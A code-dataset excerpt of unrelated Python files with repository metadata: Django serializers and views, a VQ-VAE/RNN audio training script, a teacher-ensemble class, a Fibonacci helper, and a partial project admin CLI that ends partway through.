17ed6b4e02bd43bc925af987ff5bf971a82da434
|
[
"BSD-3-Clause"
] | 7
|
2019-12-04T22:38:13.000Z
|
2021-06-10T17:50:06.000Z
|
s3_file_uploads/serializers.py
|
dabapps/django-s3-file-uploads
|
17ed6b4e02bd43bc925af987ff5bf971a82da434
|
[
"BSD-3-Clause"
] | null | null | null |
from rest_framework import serializers
from s3_file_uploads.constants import ACCESS_CONTROL_TYPES, PRIVATE
from s3_file_uploads.models import UploadedFile
class UploadedFileSerializer(serializers.ModelSerializer):
file_name = serializers.CharField(source='file.name', read_only=True)
file = serializers.URLField(source='get_download_url', read_only=True)
class Meta:
model = UploadedFile
fields = [
'id',
'created',
'modified',
'file_key',
'file',
'filename',
'file_name',
'file_path',
'user',
]
read_only_fields = [
'id',
'modfied',
'created',
'file_name',
'file_path',
'file_key'
]
class AccessControlListSerializer(serializers.Serializer):
acl = serializers.ChoiceField(choices=ACCESS_CONTROL_TYPES, default=PRIVATE)
| 27.457143
| 80
| 0.597294
| 801
| 0.833507
| 0
| 0
| 0
| 0
| 0
| 0
| 160
| 0.166493
|
553a35ee3c9965503e444537543d6f056c2747c7
| 1,873
|
py
|
Python
|
vbts_webadmin/views/subscribers.py
|
pcarivbts/vbts-webadmin
|
0616eca6492daa3ebc26b442e8dbebda7ac06d51
|
[
"BSD-3-Clause"
] | null | null | null |
vbts_webadmin/views/subscribers.py
|
pcarivbts/vbts-webadmin
|
0616eca6492daa3ebc26b442e8dbebda7ac06d51
|
[
"BSD-3-Clause"
] | 3
|
2020-06-05T18:34:16.000Z
|
2021-06-10T20:31:18.000Z
|
vbts_webadmin/views/subscribers.py
|
pcarivbts/vbts-webadmin
|
0616eca6492daa3ebc26b442e8dbebda7ac06d51
|
[
"BSD-3-Clause"
] | 2
|
2018-07-04T00:54:50.000Z
|
2022-01-28T16:52:10.000Z
|
"""
Copyright (c) 2015-present, Philippine-California Advanced Research Institutes-
The Village Base Station Project (PCARI-VBTS). All rights reserved.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
"""
from django.contrib import messages as alerts
from django.contrib.auth.decorators import login_required
from django.core.paginator import Paginator
from django.core.paginator import EmptyPage
from django.core.paginator import PageNotAnInteger
from django.db.models import Q
from django.shortcuts import render
from django.utils.translation import ugettext as _
from vbts_subscribers.models import SipBuddies
from vbts_webadmin.forms import SearchForm
@login_required
def subscribers_list(request, template_name='subscribers/list.html'):
data = {}
if 'search' in request.GET:
subscribers = SipBuddies.objects.all()
for term in request.GET['search'].split():
subscribers = subscribers.filter(Q(name__icontains=term) |
Q(callerid__icontains=term))
data['search'] = True
alerts.info(request,
_("You've searched for: '%s'") % request.GET['search'])
else:
subscribers = SipBuddies.objects.all()
paginator = Paginator(subscribers, 15)
page = request.GET.get('page')
is_paginated = False
if paginator.num_pages > 1:
is_paginated = True
try:
subscribers = paginator.page(page)
except PageNotAnInteger:
subscribers = paginator.page(1)
except EmptyPage:
subscribers = paginator.page(paginator.num_pages)
form = SearchForm(form_action='subscribers')
data['subscribers'] = subscribers
data['is_paginated'] = is_paginated
data['form'] = form
return render(request, template_name, data)
| 33.446429
| 79
| 0.705286
| 0
| 0
| 0
| 0
| 1,134
| 0.605446
| 0
| 0
| 416
| 0.222104
|
553df305accc95bd90095dbb25295bf9604e38ba
| 268
|
py
|
Python
|
Aula 05/[Exercicio 01] .py
|
IsaacPSilva/LetsCode
|
64396ee9fd0ad395598c74c3727a614261e5dd50
|
[
"MIT"
] | null | null | null |
Aula 05/[Exercicio 01] .py
|
IsaacPSilva/LetsCode
|
64396ee9fd0ad395598c74c3727a614261e5dd50
|
[
"MIT"
] | null | null | null |
Aula 05/[Exercicio 01] .py
|
IsaacPSilva/LetsCode
|
64396ee9fd0ad395598c74c3727a614261e5dd50
|
[
"MIT"
] | null | null | null |
'''1. Faça um programa que pede para o usuário digitar uma palavra e
imprima cada letra em uma linha.'''
#Informando frase a ser verificada
frase = input('Digite uma palavra: ')
#Convertendo frase em palavras, e imprimindo depois
for letra in frase:
print(letra)
| 29.777778
| 68
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 213
| 0.788889
|
553e5975ce3bca9dd2037d832b61d89b76e372a6
| 16,307
|
py
|
Python
|
examples/vq_rnn_fruit_joint/vq_fruit_joint.py
|
kastnerkyle/tfbldr
|
58ad1437d500924acd15d1c6eec4a864f57e9c7c
|
[
"BSD-3-Clause"
] | 4
|
2018-05-15T22:35:00.000Z
|
2019-02-22T01:40:49.000Z
|
examples/vq_rnn_fruit_joint/vq_fruit_joint.py
|
kastnerkyle/tfbldr
|
58ad1437d500924acd15d1c6eec4a864f57e9c7c
|
[
"BSD-3-Clause"
] | null | null | null |
examples/vq_rnn_fruit_joint/vq_fruit_joint.py
|
kastnerkyle/tfbldr
|
58ad1437d500924acd15d1c6eec4a864f57e9c7c
|
[
"BSD-3-Clause"
] | 2
|
2018-06-09T15:08:44.000Z
|
2018-11-20T10:13:48.000Z
|
from tfbldr.nodes import Conv2d
from tfbldr.nodes import ConvTranspose2d
from tfbldr.nodes import VqEmbedding
from tfbldr.nodes import BatchNorm2d
from tfbldr.nodes import Linear
from tfbldr.nodes import ReLU
from tfbldr.nodes import Sigmoid
from tfbldr.nodes import Tanh
from tfbldr.nodes import OneHot
from tfbldr.nodes import Softmax
from tfbldr.nodes import LSTMCell
from tfbldr.nodes import CategoricalCrossEntropyIndexCost
from tfbldr.nodes import CategoricalCrossEntropyLinearIndexCost
from tfbldr.nodes import BernoulliCrossEntropyCost
from tfbldr.datasets import ordered_list_iterator
from tfbldr.plot import get_viridis
from tfbldr.plot import autoaspect
from tfbldr.datasets import fetch_fruitspeech
from tfbldr import get_params_dict
from tfbldr import run_loop
from tfbldr import scan
import tensorflow as tf
import numpy as np
from collections import namedtuple, defaultdict
import itertools
viridis_cm = get_viridis()
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
fruit = fetch_fruitspeech()
minmin = np.inf
maxmax = -np.inf
for s in fruit["data"]:
si = s - s.mean()
minmin = min(minmin, si.min())
maxmax = max(maxmax, si.max())
train_data = []
valid_data = []
type_counts = defaultdict(lambda: 0)
final_audio = []
for n, s in enumerate(fruit["data"]):
type_counts[fruit["target"][n]] += 1
s = s - s.mean()
n_s = (s - minmin) / float(maxmax - minmin)
n_s = 2 * n_s - 1
#n_s = mu_law_transform(n_s, 256)
if type_counts[fruit["target"][n]] == 15:
valid_data.append(n_s)
else:
train_data.append(n_s)
def _cuts(list_of_audio, cut, step):
# make many overlapping cuts
# 8k, this means offset is ~4ms @ step of 32
real_final = []
real_idx = []
for n, s in enumerate(list_of_audio):
# cut off the end
s = s[:len(s) - len(s) % step]
starts = np.arange(0, len(s) - cut + step, step)
for st in starts:
real_final.append(s[st:st + cut][None, :, None])
real_idx.append(n)
return real_final, real_idx
cut = 256
step = 1
train_audio, train_audio_idx = _cuts(train_data, cut, step)
valid_audio, valid_audio_idx = _cuts(valid_data, cut, step)
random_state = np.random.RandomState(1999)
l1_dim = (64, 1, 4, [1, 1, 2, 1])
l2_dim = (128, 1, 4, [1, 1, 2, 1])
l3_dim = (256, 1, 4, [1, 1, 2, 1])
l3_dim = (257, 1, 4, [1, 1, 2, 1])
l4_dim = (256, 1, 4, [1, 1, 2, 1])
l5_dim = (257, 1, 1, [1, 1, 1, 1])
embedding_dim = 512
vqvae_batch_size = 50
rnn_batch_size = 50
n_hid = 512
n_clusters = 64
# goes from 256 -> 16
hardcoded_z_len = 16
# reserve 0 for "start code"
n_inputs = embedding_dim + 1
switch_step = 10000
both = True
# reserve 0 for start code
rnn_init = "truncated_normal"
forward_init = "truncated_normal"
l_dims = [l1_dim, l2_dim, l3_dim, l4_dim, l5_dim]
stride_div = np.prod([ld[-1] for ld in l_dims])
ebpad = [0, 0, 4 // 2 - 1, 0]
dbpad = [0, 0, 4 // 2 - 1, 0]
train_itr_random_state = np.random.RandomState(1122)
valid_itr_random_state = np.random.RandomState(12)
train_itr = ordered_list_iterator([train_audio], train_audio_idx, vqvae_batch_size, random_state=train_itr_random_state)
valid_itr = ordered_list_iterator([valid_audio], valid_audio_idx, vqvae_batch_size, random_state=valid_itr_random_state)
"""
for i in range(10000):
tt = train_itr.next_batch()
# tt[0][3][:, :16] == tt[0][2][:, 16:32]
"""
def create_encoder(inp, bn_flag):
l1 = Conv2d([inp], [1], l_dims[0][0], kernel_size=l_dims[0][1:3], name="enc1",
strides=l_dims[0][-1],
border_mode=ebpad,
random_state=random_state)
bn_l1 = BatchNorm2d(l1, bn_flag, name="bn_enc1")
r_l1 = ReLU(bn_l1)
l2 = Conv2d([r_l1], [l_dims[0][0]], l_dims[1][0], kernel_size=l_dims[1][1:3], name="enc2",
strides=l_dims[1][-1],
border_mode=ebpad,
random_state=random_state)
bn_l2 = BatchNorm2d(l2, bn_flag, name="bn_enc2")
r_l2 = ReLU(bn_l2)
l3 = Conv2d([r_l2], [l_dims[1][0]], l_dims[2][0], kernel_size=l_dims[2][1:3], name="enc3",
strides=l_dims[2][-1],
border_mode=ebpad,
random_state=random_state)
bn_l3 = BatchNorm2d(l3, bn_flag, name="bn_enc3")
r_l3 = ReLU(bn_l3)
l4 = Conv2d([r_l3], [l_dims[2][0]], l_dims[3][0], kernel_size=l_dims[3][1:3], name="enc4",
strides=l_dims[3][-1],
border_mode=ebpad,
random_state=random_state)
bn_l4 = BatchNorm2d(l4, bn_flag, name="bn_enc4")
r_l4 = ReLU(bn_l4)
l5 = Conv2d([r_l4], [l_dims[3][0]], l_dims[4][0], kernel_size=l_dims[4][1:3], name="enc5",
random_state=random_state)
bn_l5 = BatchNorm2d(l5, bn_flag, name="bn_enc5")
return bn_l5
def create_decoder(latent, bn_flag):
l1 = Conv2d([latent], [l_dims[-1][0]], l_dims[-2][0], kernel_size=l_dims[-1][1:3], name="dec1",
random_state=random_state)
bn_l1 = BatchNorm2d(l1, bn_flag, name="bn_dec1")
r_l1 = ReLU(bn_l1)
l2 = ConvTranspose2d([r_l1], [l_dims[-2][0]], l_dims[-3][0], kernel_size=l_dims[-2][1:3], name="dec2",
strides=l_dims[-2][-1],
border_mode=dbpad,
random_state=random_state)
bn_l2 = BatchNorm2d(l2, bn_flag, name="bn_dec2")
r_l2 = ReLU(bn_l2)
l3 = ConvTranspose2d([r_l2], [l_dims[-3][0]], l_dims[-4][0], kernel_size=l_dims[-3][1:3], name="dec3",
strides=l_dims[-3][-1],
border_mode=dbpad,
random_state=random_state)
bn_l3 = BatchNorm2d(l3, bn_flag, name="bn_dec3")
r_l3 = ReLU(bn_l3)
l4 = ConvTranspose2d([r_l3], [l_dims[-4][0]], l_dims[-5][0], kernel_size=l_dims[-4][1:3], name="dec4",
strides=l_dims[-4][-1],
border_mode=dbpad,
random_state=random_state)
bn_l4 = BatchNorm2d(l4, bn_flag, name="bn_dec4")
r_l4 = ReLU(bn_l4)
l5 = ConvTranspose2d([r_l4], [l_dims[-5][0]], 1, kernel_size=l_dims[-5][1:3], name="dec5",
strides=l_dims[-5][-1],
border_mode=dbpad,
random_state=random_state)
#s_l5 = Sigmoid(l5)
t_l5 = Tanh(l5)
return t_l5
def create_vqvae(inp, bn):
z_e_x = create_encoder(inp, bn)
z_q_x, z_i_x, z_nst_q_x, emb = VqEmbedding(z_e_x, l_dims[-1][0], embedding_dim, random_state=random_state, name="embed")
x_tilde = create_decoder(z_q_x, bn)
return x_tilde, z_e_x, z_q_x, z_i_x, z_nst_q_x, emb
def create_vqrnn(inp_tm1, inp_t, h1_init, c1_init, h1_q_init, c1_q_init):
oh_tm1 = OneHot(inp_tm1, n_inputs)
p_tm1 = Linear([oh_tm1], [n_inputs], n_hid, random_state=random_state, name="proj",
init=forward_init)
def step(x_t, h1_tm1, c1_tm1, h1_q_tm1, c1_q_tm1):
output, s = LSTMCell([x_t], [n_hid], h1_tm1, c1_tm1, n_hid,
random_state=random_state,
name="rnn1", init=rnn_init)
h1_t = s[0]
c1_t = s[1]
output, s = LSTMCell([h1_t], [n_hid], h1_q_tm1, c1_q_tm1, n_hid,
random_state=random_state,
name="rnn1_q", init=rnn_init)
h1_cq_t = s[0]
c1_q_t = s[1]
h1_q_t, h1_i_t, h1_nst_q_t, h1_emb = VqEmbedding(h1_cq_t, n_hid, n_clusters,
random_state=random_state,
name="h1_vq_emb")
# not great
h1_i_t = tf.cast(h1_i_t, tf.float32)
return output, h1_t, c1_t, h1_q_t, c1_q_t, h1_nst_q_t, h1_cq_t, h1_i_t
r = scan(step, [p_tm1], [None, h1_init, c1_init, h1_q_init, c1_q_init, None, None, None])
out = r[0]
hiddens = r[1]
cells = r[2]
q_hiddens = r[3]
q_cells = r[4]
q_nst_hiddens = r[5]
q_nvq_hiddens = r[6]
i_hiddens = r[7]
pred = Linear([out], [n_hid], n_inputs, random_state=random_state, name="out",
init=forward_init)
pred_sm = Softmax(pred)
return pred_sm, pred, hiddens, cells, q_hiddens, q_cells, q_nst_hiddens, q_nvq_hiddens, i_hiddens, oh_tm1
def create_graph():
graph = tf.Graph()
with graph.as_default():
# vqvae part
# define all the vqvae inputs and outputs
vqvae_inputs = tf.placeholder(tf.float32, shape=[None, train_audio[0].shape[0],
train_audio[0].shape[1],
train_audio[0].shape[2]])
bn_flag = tf.placeholder_with_default(tf.zeros(shape=[]), shape=[])
x_tilde, z_e_x, z_q_x, z_i_x, z_nst_q_x, z_emb = create_vqvae(vqvae_inputs, bn_flag)
#rec_loss = tf.reduce_mean(BernoulliCrossEntropyCost(x_tilde, images))
vqvae_rec_loss = tf.reduce_mean(tf.square(x_tilde - vqvae_inputs))
vqvae_vq_loss = tf.reduce_mean(tf.square(tf.stop_gradient(z_e_x) - z_nst_q_x))
vqvae_commit_loss = tf.reduce_mean(tf.square(z_e_x - tf.stop_gradient(z_nst_q_x)))
vqvae_alpha = 1.
vqvae_beta = 0.25
vqvae_loss = vqvae_rec_loss + vqvae_alpha * vqvae_vq_loss + vqvae_beta * vqvae_commit_loss
vqvae_params = get_params_dict()
# get vqvae keys now, dict is *dynamic* and shared
vqvae_params_keys = [k for k in vqvae_params.keys()]
vqvae_grads = tf.gradients(vqvae_loss, vqvae_params.values())
learning_rate = 0.0002
vqvae_optimizer = tf.train.AdamOptimizer(learning_rate, use_locking=True)
assert len(vqvae_grads) == len(vqvae_params)
j = [(g, p) for g, p in zip(vqvae_grads, vqvae_params.values())]
vqvae_train_step = vqvae_optimizer.apply_gradients(j)
# rnn part
# ultimately we will use 2 calls to feed_dict to make lookup mappings easier, but could do it like this
#rnn_inputs = tf.cast(tf.stop_gradient(tf.transpose(z_i_x, (2, 0, 1))), tf.float32)
rnn_inputs = tf.placeholder(tf.float32, shape=[None, rnn_batch_size, 1])
rnn_inputs_tm1 = rnn_inputs[:-1]
rnn_inputs_t = rnn_inputs[1:]
init_hidden = tf.placeholder(tf.float32, shape=[rnn_batch_size, n_hid])
init_cell = tf.placeholder(tf.float32, shape=[rnn_batch_size, n_hid])
init_q_hidden = tf.placeholder(tf.float32, shape=[rnn_batch_size, n_hid])
init_q_cell = tf.placeholder(tf.float32, shape=[rnn_batch_size, n_hid])
r = create_vqrnn(rnn_inputs_tm1, rnn_inputs_t, init_hidden, init_cell, init_q_hidden, init_q_cell)
pred_sm, pred, hiddens, cells, q_hiddens, q_cells, q_nst_hiddens, q_nvq_hiddens, i_hiddens, oh_tm1 = r
rnn_rec_loss = tf.reduce_mean(CategoricalCrossEntropyIndexCost(pred_sm, rnn_inputs_t))
#rnn_rec_loss = tf.reduce_mean(CategoricalCrossEntropyLinearIndexCost(pred, rnn_inputs_t))
rnn_alpha = 1.
rnn_beta = 0.25
rnn_vq_h_loss = tf.reduce_mean(tf.square(tf.stop_gradient(q_nvq_hiddens) - q_nst_hiddens))
rnn_commit_h_loss = tf.reduce_mean(tf.square(q_nvq_hiddens - tf.stop_gradient(q_nst_hiddens)))
rnn_loss = rnn_rec_loss + rnn_alpha * rnn_vq_h_loss + rnn_beta * rnn_commit_h_loss
rnn_params = {k:v for k, v in get_params_dict().items() if k not in vqvae_params_keys}
rnn_grads = tf.gradients(rnn_loss, rnn_params.values())
learning_rate = 0.0001
rnn_optimizer = tf.train.AdamOptimizer(learning_rate, use_locking=True)
assert len(rnn_grads) == len(rnn_params)
rnn_grads = [tf.clip_by_value(g, -10., 10.) if g is not None else None for g in rnn_grads]
j = [(g, p) for g, p in zip(rnn_grads, rnn_params.values())]
rnn_train_step = rnn_optimizer.apply_gradients(j)
things_names = ["vqvae_inputs",
"bn_flag",
"x_tilde",
"z_e_x",
"z_q_x",
"z_i_x",
"z_emb",
"vqvae_loss",
"vqvae_rec_loss",
"vqvae_train_step",
"rnn_inputs",
"rnn_inputs_tm1",
"rnn_inputs_t",
"init_hidden",
"init_cell",
"init_q_hidden",
"init_q_cell",
"hiddens",
"cells",
"q_hiddens",
"q_cells",
"q_nvq_hiddens",
"i_hiddens",
"pred",
"pred_sm",
"oh_tm1",
"rnn_loss",
"rnn_rec_loss",
"rnn_train_step"]
things_tf = [eval(name) for name in things_names]
for tn, tt in zip(things_names, things_tf):
graph.add_to_collection(tn, tt)
train_model = namedtuple('Model', things_names)(*things_tf)
return graph, train_model
g, vs = create_graph()
rnn_train = False
step = 0
def loop(sess, itr, extras, stateful_args):
x, = itr.next_batch()
init_h = np.zeros((rnn_batch_size, n_hid)).astype("float32")
init_c = np.zeros((rnn_batch_size, n_hid)).astype("float32")
init_q_h = np.zeros((rnn_batch_size, n_hid)).astype("float32")
init_q_c = np.zeros((rnn_batch_size, n_hid)).astype("float32")
global rnn_train
global step
if extras["train"]:
step += 1
if step > switch_step:
rnn_train = True
if both or not rnn_train:
feed = {vs.vqvae_inputs: x,
vs.bn_flag: 0.}
outs = [vs.vqvae_rec_loss, vs.vqvae_loss, vs.vqvae_train_step, vs.z_i_x]
r = sess.run(outs, feed_dict=feed)
vqvae_l = r[0]
vqvae_t_l = r[1]
vqvae_step = r[2]
if rnn_train:
feed = {vs.vqvae_inputs: x,
vs.bn_flag: 1.}
outs = [vs.vqvae_rec_loss, vs.z_i_x]
r = sess.run(outs, feed_dict=feed)
vqvae_l = r[0]
vqvae_t_l = r[1]
discrete_z = r[-1]
#discrete_z[3][:, 2:-2] == discrete_z[4][:, 1:-3]
#discrete_z = discrete_z[:, :, 1:-2]
shp = discrete_z.shape
# always start with 0
rnn_inputs = np.zeros((shp[2] + 1, shp[0], shp[1]))
rnn_inputs[1:] = discrete_z.transpose(2, 0, 1) + 1.
if both or rnn_train:
feed = {vs.rnn_inputs: rnn_inputs,
vs.init_hidden: init_h,
vs.init_cell: init_c,
vs.init_q_hidden: init_q_h,
vs.init_q_cell: init_q_c}
outs = [vs.rnn_rec_loss, vs.rnn_loss, vs.rnn_train_step]
r = sess.run(outs, feed_dict=feed)
rnn_l = r[0]
rnn_t_l = r[1]
rnn_step = r[2]
if not rnn_train:
feed = {vs.rnn_inputs: rnn_inputs,
vs.init_hidden: init_h,
vs.init_cell: init_c,
vs.init_q_hidden: init_q_h,
vs.init_q_cell: init_q_c}
outs = [vs.rnn_rec_loss]
r = sess.run(outs, feed_dict=feed)
rnn_l = r[0]
else:
feed = {vs.vqvae_inputs: x,
vs.bn_flag: 1.}
outs = [vs.vqvae_rec_loss, vs.z_i_x]
r = sess.run(outs, feed_dict=feed)
vqvae_l = r[0]
discrete_z = r[-1]
#discrete_z = discrete_z[:, :, 1:-2]
shp = discrete_z.shape
# always start with 0
rnn_inputs = np.zeros((shp[2] + 1, shp[0], shp[1]))
rnn_inputs[1:] = discrete_z.transpose(2, 0, 1) + 1.
feed = {vs.rnn_inputs: rnn_inputs,
vs.init_hidden: init_h,
vs.init_cell: init_c,
vs.init_q_hidden: init_q_h,
vs.init_q_cell: init_q_c}
outs = [vs.rnn_rec_loss]
r = sess.run(outs, feed_dict=feed)
rnn_l = r[0]
return [vqvae_l, rnn_l], None, stateful_args
with tf.Session(graph=g) as sess:
run_loop(sess,
loop, train_itr,
loop, valid_itr,
n_steps=75000,
n_train_steps_per=5000,
n_valid_steps_per=500)
| 38.189696
| 124
| 0.592506
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,584
| 0.097136
|
553eb4733f79df133de3656ed4a77eb050d859d2
| 311
|
py
|
Python
|
scripts/poorscrum/poorscrum_tools.py
|
r09491/poorscrum
|
cdbbc0db03fde842f546093f46e70d03a105bbbd
|
[
"MIT"
] | null | null | null |
scripts/poorscrum/poorscrum_tools.py
|
r09491/poorscrum
|
cdbbc0db03fde842f546093f46e70d03a105bbbd
|
[
"MIT"
] | 7
|
2021-03-18T22:37:46.000Z
|
2022-03-11T23:41:39.000Z
|
scripts/poorscrum/poorscrum_tools.py
|
r09491/poorscrum
|
cdbbc0db03fde842f546093f46e70d03a105bbbd
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
def fibonacci(n):
if n == 0:
return 0
elif n == 1:
return 1
else:
return fibonacci(n-1) + fibonacci(n-2)
def story_points(start):
for i in range(10):
result = fibonacci(i)
if result >= start:
break
return result
| 17.277778
| 46
| 0.508039
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 23
| 0.073955
|
554005d26d7a3413df01a385a87bf09337208562
| 6,162
|
py
|
Python
|
cata/teachers/ensembles/both_rotation_ensemble.py
|
seblee97/student_teacher_catastrophic
|
9baaaf2850025ba9cf33d61c42386bc4c3b2dad2
|
[
"MIT"
] | 2
|
2021-09-13T01:44:09.000Z
|
2021-12-11T11:56:49.000Z
|
cata/teachers/ensembles/both_rotation_ensemble.py
|
seblee97/student_teacher_catastrophic
|
9baaaf2850025ba9cf33d61c42386bc4c3b2dad2
|
[
"MIT"
] | 8
|
2020-11-13T18:37:30.000Z
|
2022-02-15T15:11:51.000Z
|
cata/teachers/ensembles/both_rotation_ensemble.py
|
seblee97/student_teacher_catastrophic
|
9baaaf2850025ba9cf33d61c42386bc4c3b2dad2
|
[
"MIT"
] | null | null | null |
from typing import List
from typing import Union
import numpy as np
import torch
from cata.teachers.ensembles import base_teacher_ensemble
from cata.utils import custom_functions
class BothRotationTeacherEnsemble(base_teacher_ensemble.BaseTeacherEnsemble):
"""Teacher ensemble (primarily for mean-field limit regime) in which both feature and
readout similarities are tuned by rotation.
"""
def __init__(
self,
input_dimension: int,
hidden_dimensions: List[int],
output_dimension: int,
bias: bool,
loss_type: str,
nonlinearities: str,
scale_hidden_lr: bool,
forward_scaling: float,
unit_norm_teacher_head: bool,
weight_normalisation: bool,
noise_stds: Union[int, float],
num_teachers: int,
initialisation_std: float,
feature_rotation_alpha: float,
readout_rotation_alpha: float,
):
self._feature_rotation_alpha = feature_rotation_alpha
self._readout_rotation_alpha = readout_rotation_alpha
super().__init__(
input_dimension=input_dimension,
hidden_dimensions=hidden_dimensions,
output_dimension=output_dimension,
bias=bias,
loss_type=loss_type,
nonlinearities=nonlinearities,
scale_hidden_lr=scale_hidden_lr,
forward_scaling=forward_scaling,
unit_norm_teacher_head=unit_norm_teacher_head,
weight_normalisation=weight_normalisation,
noise_stds=noise_stds,
num_teachers=num_teachers,
initialisation_std=initialisation_std,
)
def _setup_teachers(self) -> None:
"""Setup teachers with copies across input to hidden and rotations
across hidden to output weights.
Raises:
AssertionError: If more than 2 teachers are requested.
AssertionError: If the network depth is greater than 1,
i.e. more than one hidden layer requested.
AssertionError: If the hidden dimension is not greater than 1,
this is for the notion of rotation to have meaning.
"""
assert (
self._num_teachers
) == 2, "Both rotation teachers currently implemented for 2 teachers only."
assert (
len(self._hidden_dimensions) == 1
), "Both rotation teachers currently implemented for 1 hidden layer only."
assert (
self._hidden_dimensions[0] > 1
), "Both rotation teachers only valid for hidden dimensions > 1."
teachers = [
self._init_teacher(
nonlinearity=self._nonlinearities[i], noise_std=self._noise_stds[i]
)
for i in range(self._num_teachers)
]
with torch.no_grad():
(
teacher_0_feature_weights,
teacher_1_feature_weights,
) = self._get_rotated_weights(
unrotated_weights=teachers[0].layers[0].weight.data.T,
alpha=self._feature_rotation_alpha,
normalisation=self._hidden_dimensions[0],
)
teachers[0].layers[0].weight.data = teacher_0_feature_weights.T
teachers[1].layers[0].weight.data = teacher_1_feature_weights.T
# (
# teacher_0_readout_weights,
# teacher_1_readout_weights,
# ) = self._get_rotated_weights(
# unrotated_weights=teachers[0].head.weight.data.T,
# alpha=self._readout_rotation_alpha,
# normalisation=None,
# )
(
teacher_0_readout_weights,
teacher_1_readout_weights,
) = self._get_rotated_readout_weights(teachers=teachers)
teachers[0].head.weight.data = teacher_0_readout_weights
teachers[1].head.weight.data = teacher_1_readout_weights
return teachers
def _feature_overlap(self, feature_1: torch.Tensor, feature_2: torch.Tensor):
alpha_matrix = torch.mm(feature_1, feature_2.T) / self._hidden_dimensions[0]
alpha = torch.mean(alpha_matrix.diagonal())
return alpha
def _readout_overlap(self, feature_1: torch.Tensor, feature_2: torch.Tensor):
alpha = torch.mm(feature_1, feature_2.T) / (
torch.norm(feature_1) * torch.norm(feature_2)
)
return alpha
def _get_rotated_weights(
self,
unrotated_weights: torch.Tensor,
alpha: float,
normalisation: Union[None, int],
):
if normalisation is not None:
# orthonormalise input to hidden weights of first teacher
self_overlap = (
torch.mm(unrotated_weights, unrotated_weights.T) / normalisation
)
L = torch.cholesky(self_overlap)
orthonormal_weights = torch.mm(torch.inverse(L), unrotated_weights)
else:
orthonormal_weights = unrotated_weights
# construct input to hidden weights of second teacher
second_teacher_rotated_weights = alpha * orthonormal_weights + np.sqrt(
1 - alpha ** 2
) * torch.randn(orthonormal_weights.shape)
return orthonormal_weights, second_teacher_rotated_weights
def _get_rotated_readout_weights(self, teachers: List):
theta = np.arccos(self._readout_rotation_alpha)
# keep current norms
current_norm = np.mean(
[torch.norm(teacher.head.weight) for teacher in teachers]
)
rotated_weight_vectors = custom_functions.generate_rotated_vectors(
dimension=self._hidden_dimensions[0],
theta=theta,
normalisation=current_norm,
)
teacher_0_rotated_weight_tensor = torch.Tensor(
rotated_weight_vectors[0]
).reshape(teachers[0].head.weight.data.shape)
teacher_1_rotated_weight_tensor = torch.Tensor(
rotated_weight_vectors[1]
).reshape(teachers[1].head.weight.data.shape)
return teacher_0_rotated_weight_tensor, teacher_1_rotated_weight_tensor
| 35.413793
| 89
| 0.636806
| 5,979
| 0.970302
| 0
| 0
| 0
| 0
| 0
| 0
| 1,159
| 0.188088
|
5542014f27e11156c75907e597b9852418147144
| 7,176
|
py
|
Python
|
scripts/admin/admin.py
|
starmarek/organize-me
|
710e7acd86e887b7e4379fde18e1f375846ea59e
|
[
"MIT"
] | null | null | null |
scripts/admin/admin.py
|
starmarek/organize-me
|
710e7acd86e887b7e4379fde18e1f375846ea59e
|
[
"MIT"
] | null | null | null |
scripts/admin/admin.py
|
starmarek/organize-me
|
710e7acd86e887b7e4379fde18e1f375846ea59e
|
[
"MIT"
] | null | null | null |
import json
import logging
import os
import shlex
import subprocess
from pathlib import Path
from types import SimpleNamespace
import coloredlogs
import fire
from .adminFiles import (
DockerComposeFile,
DotenvFile,
GitlabCIFile,
JsonFile,
PackageJsonFile,
Pipfile,
RuntimeTxtFile,
YarnRCFile,
)
log = logging.getLogger("admin")
coloredlogs.install(level="DEBUG")
yarn_dir = ".yarn/releases/"
for file in os.listdir(".yarn/releases"):
if os.getenv("CORE_YARN_VER") in file:
yarn_executable = file
virtualenv_path = subprocess.run(["pipenv", "--venv"], capture_output=True, text=True, check=True).stdout.strip()
dotenv_file = DotenvFile(path=".env")
compose_file = DockerComposeFile(path="docker-compose.yml")
dotenv_template_file = DotenvFile(path=".template.env")
gitlab_ci_file = GitlabCIFile(path=".gitlab-ci.yml")
yarnrc_file = YarnRCFile(path=".yarnrc.yml")
runtime_txt_file = RuntimeTxtFile(path="runtime.txt")
pipfile_file = Pipfile(path="Pipfile")
package_json_file = PackageJsonFile(path="package.json")
verifiable_files = [compose_file, gitlab_ci_file, pipfile_file, runtime_txt_file, package_json_file, yarnrc_file]
def _update_virtualenv_vscode_pythonpath():
settings_file = JsonFile(path=".vscode/settings.json")
Path(settings_file.path.split("/")[-2]).mkdir(exist_ok=True)
if Path(settings_file.path).exists():
settings_file["python.pythonPath"] = f"{virtualenv_path}/bin/python"
settings_file.dump()
else:
settings_file.data = json.loads(json.dumps({"python.pythonPath": f"{virtualenv_path}/bin/python"}))
settings_file.dump()
log.info(f"Setting vscode pythonpath to '{virtualenv_path}/bin/python'")
def _install_pre_commit():
log.info("Installing pre-commit hooks")
subprocess.run(shlex.split(f"{virtualenv_path}/bin/pre-commit install"), check=True)
log.warning("You need to install shfmt and shellcheck on your computer in order to pre-commit hooks to work.")
def _verify_dotenvs():
log.info("Verifying dotenvs compatibility")
assert all(val == dotenv_template_file[key] for key, val in dotenv_file.data.items() if key.startswith("CORE"))
def _verify_yarn_executable():
log.info("Verifying yarn compatibility")
assert any(os.getenv("CORE_YARN_VER") in yarn_executable for yarn_executable in os.listdir(".yarn/releases"))
def _verify_versions():
curr = dotenv_file
reference = dotenv_template_file
try:
_verify_dotenvs()
reference = dotenv_file
curr = SimpleNamespace(name="files in .yarn/releases dir")
_verify_yarn_executable()
log.info("Verifying compatibility of core versions")
for ver_file in verifiable_files:
curr = ver_file
assert ver_file.verify_core_versions()
except AssertionError:
log.error(
f"There is a mismatch between {curr.name} and {reference.name}! Make sure that you are using admin script to bump versions of packages!"
)
raise
class CLI:
def __init__(self, vscode=False):
try:
self.running_in_vscode = os.environ["TERM_PROGRAM"] == "vscode"
except KeyError:
self.running_in_vscode = False
if vscode:
self.running_in_vscode = True
def update_yarn(self, ver):
log.info("Upgrading yarn")
subprocess.run([yarn_dir + yarn_executable, "set", "version", ver], check=True)
dotenv_template_file["CORE_YARN_VER"] = ver
